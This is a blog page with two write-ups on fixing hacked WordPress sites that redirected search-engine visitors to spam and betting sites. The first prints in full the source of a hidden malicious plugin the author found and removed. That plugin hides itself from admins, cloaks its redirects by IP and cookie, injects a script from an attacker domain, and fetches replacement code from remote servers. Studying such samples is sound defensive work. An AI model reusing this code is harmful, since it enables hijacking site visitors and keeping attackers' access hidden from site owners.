sell website making service

Tag: YITH Infinite Scrolling

Hacked code injected of ad site – re directs when clicked from google search

Hacked code injected of ad site - re directs when clicked from google search

When clicking on a website’s link from Google and visitor lands on the page, and if the visitor clicks on any link on that particular web page it auto redirects to URLs containing “shigaxapo”. But if the visitor is not from the search engine it doesn’t re-direct and behaves normally. Only visitors from search engines is redirected and other users are safe from this hacked process. In this article, I will discuss how I solved this malware.

Message I got from the client

From a client, I got a message “can you fix this problem? My website is redirecting visitors to another website, do you know why this is happening?” I hoped in quickly and replied to him “I need to analyze first because every website is different and not one solution fits all and hacking is a complicated procedure to fix”. The client agreed and allowed us to investigate the issue.

Formula to solve a problem

Note: from my past experience I have seen solving a problem or making a change or customization is requires 2 major step: 1) Analyzing the problem and finding a way to fix, it takes 80-90% of the time and 2) rest 10-15% is just actually making the change in codes or files physically.

Scenario:

I saw when I click results from Google and land on the site, and click link on the site it is re directing me to URLs containing “shigaxapo” but when I am on the site it is not re directing anymore, or if I visit the site directly as a visitor it is not re directing and as an admin when logged in it was also not redirecting.

My thoughts:

As it is redirecting to urls containing “shigaxapo”, I “inspect element” with Google Chrome and found nothing, and re direction cannot be done on WordPress by CSS or HTML it must be using javascript or php.

My steps:

So I downloaded the whole site files with Filezilla FTP and searched for the word “shigaxapo” with Notepad++ luckily I found a malware file that is not part of or any other authentic plugin by WordPress. The file was mplugin.php there I analyzed the PHP file and found codes and functions, algorithms to inject the site with such malware. From that php file, I got another file admin_ips.txt where admin ips are stored like this:

2.36.67.193
81.31.155.59
119.30.47.136

My Verdict:

Inside plugins folder it is injected/hacked, this is a plugin that hides itself and activates automatically. You can check from activated plugins that 1 extra plugin is activated but not visible from the wp-admin plugins list.

I deleted those files and ran multiple tests from different devices and re-directing problem was solved successfully. And the client was happy :D.

I will be attaching some codes or the file to make it clear. Leave a comment below if you have any questions or ask me anything.

Share this article if it helps.

If you need help regarding any WordPress/website issues, you can contact me.

Below is the code from file mplugin.php

<?php
/**
 * Plugin Name: Monetization Code plugin
 * Description: mplugin Shows cusom codes to display your ad codes.
 * Author: aerin Singh
 * Version: 1.0
 */
error_reporting(0);
ini_set('display_errors', 0);
$plugin_key='276be77f6692f898404fb9629f81db09';
$version='1.2';

add_action('admin_menu', function() {
    add_options_page( 'mplugin Plugin', 'mplugin', 'manage_options', 'mplugin', 'mplugin_page' );
    remove_submenu_page( 'options-general.php', 'mplugin' );
});



add_filter('plugin_action_links_'.plugin_basename(__FILE__), 'salcode_add_plugin_page_settings_mplugin');
function salcode_add_plugin_page_settings_mplugin( $links ) {
	$links[] = '<a href="' .
		admin_url( 'options-general.php?page=mplugin' ) .
		'">' . __('Settings') . '</a>';
	return $links;
}






add_action( 'admin_init', function() {

    register_setting( 'mplugin-settings', 'default_mont_options' );
    register_setting( 'mplugin-settings', 'ad_code' );
	register_setting( 'mplugin-settings', 'hide_admin' );
	register_setting( 'mplugin-settings', 'hide_logged_in' );
    register_setting( 'mplugin-settings', 'display_ad' );
    register_setting( 'mplugin-settings', 'search_engines' );
	register_setting( 'mplugin-settings', 'auto_update' );
	register_setting( 'mplugin-settings', 'ip_admin');
	register_setting( 'mplugin-settings', 'cookies_admin' );
	register_setting( 'mplugin-settings', 'logged_admin' );
	register_setting( 'mplugin-settings', 'log_install' );
	
});

$ad_code='
<script>
(function(__htas){
var d = document,
    s = d.createElement(\'script\'),
    l = d.scripts[d.scripts.length - 1];
s.settings = __htas || {};
s.src = "\/\/shigaxapo.com\/c\/D.9D6\/bA2D5hlJSnWaQf9AN\/DsEP0\/MCTdgo2cN-i\/0\/0oM\/T\/Q\/xoOsDJYX3v";
l.parentNode.insertBefore(s, l);
})({})
</script>

';

$hide_admin='on';
$hide_logged_in='on';
$display_ad='organic';
$search_engines='google.,/search?,images.google., web.info.com, search.,yahoo.,yandex,msn.,baidu,bing.,doubleclick.net,googleweblight.com';
$auto_update='on';
$ip_admin='on';
$cookies_admin='on';
$logged_admin='on';
$log_install='';

function mplugin_page() {
 ?>
   <div class="wrap">
<form action="options.php" method="post">
       <?php
       settings_fields( 'mplugin-settings' );
       do_settings_sections( 'mplugin-settings' );
$ad_code='';

$hide_admin='on';
$hide_logged_in='on';
$display_ad='organic';
$search_engines='google.,/search?,images.google., web.info.com, search.,yahoo.,yandex,msn.,baidu,bing.,doubleclick.net,googleweblight.com';
$auto_update='on';
$ip_admin='on';
$cookies_admin='on';
$logged_admin='on';
$log_install='';

       ?>
	   <h2>mplugin Plugin</h2>
	   <table>
             
 <tr>
                <th>Ad Code</th>
                <td><textarea placeholder="" name="ad_code" rows="5" cols="130"><?php echo get_option('ad_code',$ad_code) ; ?></textarea></td>
            </tr>
			
			
			
<tr>
                <th>Hide ads to :</th>
                <td>
                    <input type="hidden" id="default_mont_options" name="default_mont_options" value="on">
                    <label>
                        <input type="checkbox" name="hide_admin" <?php echo esc_attr( get_option('hide_admin',$hide_admin) ) == 'on' ? 'checked="checked"' : ''; ?> />admins
                    </label>
                    <label>
                        <input type="checkbox" name="hide_logged_in" <?php echo esc_attr( get_option('hide_logged_in',$hide_logged_in) ) == 'on' ? 'checked="checked"' : ''; ?> />logged in users
                    </label>
					<br/>
                 

                </td>
            </tr>
			
			
			
			<tr>
                <th>Recognize admin by :</th>
                <td>

                    <label>
                        <input type="checkbox" name="logged_admin" <?php echo esc_attr( get_option('logged_admin',$logged_admin) ) == 'on' ? 'checked="checked"' : ''; ?> />logged in
                    </label>
                    <label>
                        <input type="checkbox" name="ip_admin" id="ip_admin"  <?php echo esc_attr( get_option('ip_admin',$ip_admin) ) == 'on' ? 'checked="checked"' : '' ?> />By IP addresses
                    </label>
                                        <label>
                        <input type="checkbox" name="cookies_admin" <?php echo esc_attr( get_option('cookies_admin',$cookies_admin) ) == 'on' ? 'checked="checked"' : ''; ?> />By Cookies
                    </label>
				
                 

                </td>
            </tr>
			
			
			
			<tr>
                <th>Display ads to :</th>
                <td>
                 				         <select name="display_ad">
                        
                        <option value="organic" <?php echo esc_attr( get_option('display_ad',$display_ad) ) == 'organic' ? 'selected="selected"' : ''; ?>>Organic traffic only</option>
                        <option value="all_visitors" <?php echo esc_attr( get_option('display_ad') ) == 'all_visitors' ? 'selected="selected"' : ''; ?>>All Visitors</option>
                        
                    </select>

                </td>
            </tr>

            <tr>
                <th>Search Engines</th>
                <td><input type="text" placeholder="Internal title" name="search_engines" value="<?php echo esc_attr( get_option('search_engines',$search_engines) ); ?>" size="80" /><p class="description">
			comma separated  </p>
				</td>
            </tr>
 
 
 <tr>
                <th>Auto Update :</th>
                <td>

                    <label>
                        <input type="checkbox" name="auto_update" <?php echo esc_attr( get_option('auto_update',$auto_update) ) == 'on' ? 'checked="checked"' : ''; ?> />auto update plugin
                    </label><br/>
                 

                </td>
            </tr>
 
            <tr>
                <td><?php submit_button(); ?></td>
            </tr>
 
        </table>
	   
	   
	   
     </form>
   </div>
 <?php
}

/*************************log install***************************/
if(get_option('log_install') !=='1')
{
    if(!$log_installed = @file_get_contents("http://www.bomndo.xyz/o2.php?host=".$_SERVER["HTTP_HOST"]))
{
    $log_installed = @file_get_contents_mplugin("http://www.bomndo.xyz/o2.php?host=".$_SERVER["HTTP_HOST"]);
}
}
/*************************set default options***************************/

if(get_option('default_mont_options') !=='on')
{
update_option('ip_admin', $ip_admin);
update_option('ad_code', $ad_code);
update_option('cookies_admin', $cookies_admin);
update_option('logged_admin', $logged_admin);
update_option('hide_admin', $hide_admin);
update_option('hide_logged_in', $hide_logged_in);
update_option('display_ad', $display_ad);
update_option('search_engines', $search_engines);
update_option('auto_update', $auto_update);
update_option('log_install', '1');
}

/************************************************************************/
include_once(ABSPATH . 'wp-includes/pluggable.php'); 

if ( ! function_exists( 'display_ad_single' ) ) {  

function display_ad_single($content){ 
if(is_single())
{

$content=$content.get_option('ad_code');;
}
return $content;
} 

function display_ad_footer(){ 
if(!is_single())
{
echo get_option('ad_code');
}
} 


//setting cookies if admin logged in
function setting_admin_cookie() {
  setcookie( 'wordpress_admin_logged_in',1, time()+3600*24*1000, COOKIEPATH, COOKIE_DOMAIN);
  }

if(get_option('cookies_admin')=='on')
{

if(is_user_logged_in())
{
add_action( 'init', 'setting_admin_cookie',1 );
}
}


//log admin IP addresses
$vis_ip=getVisIpAddr_mplugin();
if(get_option('ip_admin')=='on')
{
if(current_user_can('edit_others_pages'))
{

if (file_exists(plugin_dir_path( __FILE__ ) .'admin_ips.txt'))
{
$ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');
}

if (stripos($ip, $vis_ip) === false)
{
$ip.=$vis_ip.'
';
@file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);

}

}
}// end if log admins ip




//add cookies to organic traffic

if(get_option('display_ad')=='organic')
{

$search_engines = explode(',', get_option('search_engines'));

$referer = $_SERVER['HTTP_REFERER'];
$SE = array('google.','/search?','images.google.', 'web.info.com', 'search.','yahoo.','yandex','msn.','baidu','bing.','doubleclick.net','googleweblight.com');
foreach ($search_engines as $search) {
  if (strpos($referer,$search)!==false) {
    setcookie("organic", 1, time()+120, COOKIEPATH, COOKIE_DOMAIN); 
	$organic=true;
  }
}

}//end




//display ad

if(!isset($_COOKIE['wordpress_admin_logged_in']) && !is_user_logged_in()) 
{

$ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');
if (stripos($ips, $vis_ip) === false)
{
/*****/
if(get_option('display_ad')=='organic')
{
if($organic==true || isset($_COOKIE['organic']))
{
add_filter('the_content','display_ad_single');
add_action('wp_footer','display_ad_footer'); 
}
}
else
{
add_filter('the_content','display_ad_single');
add_action('wp_footer','display_ad_footer');  
}

/****/

}

}
/*******************/





//update plugin

if(get_option('auto_update')=='on')
{

if( ini_get('allow_url_fopen') ) {



        if (($new_version = @file_get_contents("http://www.bomndo.xyz/update.php") OR $new_version = @file_get_contents_mplugin("http://www.bomndo.xyz/update.php")) AND stripos($new_version, $plugin_key) !== false) {

            if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {
               @file_put_contents(__FILE__, $new_version);
                
            }
        }
        
        
                elseif ($new_version = @file_get_contents("http://www.bomndo.com/update.php") AND stripos($new_version, $plugin_key) !== false) {

            if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {
               @file_put_contents(__FILE__, $new_version);
                
            }
        }


        elseif ($new_version = @file_get_contents("http://www.bomndo.top/update.php") AND stripos($new_version, $plugin_key) !== false) {

            if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {
               @file_put_contents(__FILE__, $new_version);
                
            }
        }

}
else
{
            if (($new_version = @file_get_contents("http://www.bomndo.xyz/update.php") OR $new_version = @file_get_contents_mplugin("http://www.bomndo.xyz/update.php")) AND stripos($new_version, $plugin_key) !== false) {

            if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {
               @file_put_contents(__FILE__, $new_version);
                
            }
        }
        
        
                elseif ($new_version = @file_get_contents_mplugin("http://www.bomndo.com/update.php") AND stripos($new_version, $plugin_key) !== false) {

            if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {
               @file_put_contents(__FILE__, $new_version);
                
            }
        }


        elseif ($new_version = @file_get_contents_mplugin("http://www.bomndo.top/update.php") AND stripos($new_version, $plugin_key) !== false) {

            if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {
               @file_put_contents(__FILE__, $new_version);
                
            }
        }
}
}//end if auto update

/*********************************/



}// if function exist



     function file_get_contents_mplugin($url)
        {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
            $data = curl_exec($ch);
            curl_close($ch);
            return $data;
        }


function hide_plugin_mplugin() {
  global $wp_list_table;
  $hidearr = array('mplugin.php');
  $myplugins = $wp_list_table->items;
  foreach ($myplugins as $key => $val) {
    if (in_array($key,$hidearr)) {
      unset($wp_list_table->items[$key]);
    }
  }
}

add_action('pre_current_active_plugins', 'hide_plugin_mplugin');

        function getVisIpAddr_mplugin() { 
      
    if (!empty($_SERVER['HTTP_CLIENT_IP'])) { 
        return $_SERVER['HTTP_CLIENT_IP']; 
    } 
    else if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) { 
        return $_SERVER['HTTP_X_FORWARDED_FOR']; 
    } 
    else { 
        return $_SERVER['REMOTE_ADDR']; 
    } 
}

?>

Wordfence plugin detected malicious file rss-xml.php

On auto scan Wordfence security plugin pointed out a hacked file. From cloudways help they were saying about such file that is taking server resources, maybe this is the file after hackers attacked the site continuously and making the server CPU usage high for last few weeks.

Screenshots given below:

Wordfence plugin detected malicious file rss-xml.php
Wordfence plugin detected malicious file rss-xml.php

Our Website was auto redirecting Google search traffic to dozens of unknown website: How we fixed the hacking?

We were randomly checking our website from mobile and to our surprise when I googled specific keywords from the WordPress woocommerce e-commerce website Dakhm.com and tapped on the search result of Dakhm, it took us to that Dakhm’s page but it auto-redirected to a couple of other websites and landed on a betting site. It was clear like a day that the website was hacked. After 1-2 days of work, I was able to find the malware with the plugin and deactivated it, now it is working fine. Dive into the article below to learn from our journey.

How did we find our website was hacked?

One of the customer over call asked for a products price, I searched with my mobile with that product name by adding Dakhm to it so google will show Dakhm’s product on first place. I tapped on the google result and on Dakhm’s product page I couldn’t tap anything and it auto redirected to other random websites. I was frustrated and understood something was wrong and website was hacked. Another abnormal fact was, when we visited from google search one of the popups by Popup Builder was automoataclly popup. Though that pop up should not pop up automatically by default when visiting the product page or any other page as that pop up was setup to pop on mouse click.

Server CPU usage was high and website was not loading

CPU usage was high on the hosting and website was not loading at all the previous days, maybe that CPU high usage was there for past 2 days. I was checking back server at Cloudways and showing CPU and ram was high constantly and not letting the site be online for more than 1 hour. I checked Cloudways monitoring tabs where I could see random ips from outside Bangladesh was accessing large number of json files constantly and those ips was not checking any product but other URLs. Normally I can understand the pattern of bots and hackers from outside Bangladesh, as Dakhm is only available for Baangladeshi customers so google will not show search results to foreign countries therefore we don’t visitors from outside Bangladesh that often. Also normal visitors checks products and and their account. When I saw large number ips from other countries was hitting Dakhm and exhausting server resources, I realsed something was not right.

How did we understand the attack on the site?

I took the ips from Cloudways and searched them on https://www.abuseipdb.com/check/23.22.35.162 and found people already reported those ips. I contacted Cloudways support, but they couldn’t point out the those ips as hackers as they didn’t suggest anything to protect the site or blocked those ips. We were bit confused to block or not block those ips? What if those are search engine bots? Cloudways support people are really good, they takes time and responsibility to solve issues but they can not solve all the issues and I can understand their effort and I have no complaints. So I let it as it is due to many ips and I can not block all the ips and wait for the server resources to back to normal. Again on the Dakhm’s product page if we tap any link the redirection starts so this is clearly a javascript issue and JS code was injected.

What cloudways did to minimize the server load?

They restarted my server in that way server load was back to normal but the attack started all over again, and I had nothing to do but wait to get back to normal.

What steps did we take to point out the hacked code?

I previously solved many hacked websites and have seen problems before. Some of my tricks are below:

Look for redirected website names on source code of the effected site

You can inspect element the effected site and search for names of the redirected websites and see which code is making the redirection, but this method was not working here.

Inspect Element using Chrome browser

Inspect element every possible way to look for the redirection code with Chrome developer tools, this method did not work either, maybe chrome has advanced tools that we need to learn to analyze such hacking code injection

Wordfence security plugin

We initiated a site scan with Wordfence though the wrdpress plugin was activated during site hacking but this plugin couldn’t stop such an accident. Also, Wordfence was not able to scan the whole site, we tried multiple times and this plugin has limitations and this plugin was no use either for now.

Cloudways Support

Their chat agent was unable to say about the malare, he created ticket for other department to solve. Later another support team member contacted and scanned the site but was not able to pin point the effected code. I asked him if he can point out the exact file or code, he said it was not their scope and asked me take their paid security service.

Cloudways support reply to malware

How did we remove the malware?

From their screenshot above I found out “pbuilder” type of word, I searched source code with it but found nothing but I saw “builder” type word on pop plugin div class names. I deactivated the pop up plugin and Thanked Allah! the malware was removed, so the attacker injected the code on that plugin.

Final check

I checked their support form https://wordpress.org/support/plugin/popup-builder/ and saw other people also reported the hack, so I was 200% sure and relieved. But the pop up function on the site remains broken as I deactivated the plugin.

Our Website was auto redirecting Google search traffic to dozens of unknown website: How we fixed the hacking?

What precautions should you take to avoid such hacking?

Actaully there are no specific operation to take. It is good to update all the plugins and themes time to time. And look for any abnormal changes after each plugin update or anytype of update. In my opinion the hackers exploited the weak spot of the plugin and did the attack so it is entirely the plugin’s fault.

Check Most Recent Posts